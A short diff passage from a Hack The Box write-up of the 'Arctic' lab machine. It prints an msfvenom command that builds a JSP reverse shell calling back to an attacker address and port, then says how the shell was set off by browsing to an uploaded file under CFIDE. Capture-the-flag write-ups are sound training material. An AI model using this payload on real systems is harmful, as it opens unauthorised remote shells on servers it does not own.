rupadrashta/HTB-WriteUps/Arctic.md

 $msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.9 LPORT=1234 -f raw > shell.jsp
 ```

-Again scheduled the task to upload the jsp_reverse_shell to Arctic host, and ran it.
+Again scheduled the task to upload the jsp_reverse_shell to Arctic host, and ran it by browsing to \CFIDE\shell.jsp.

 This time it worked.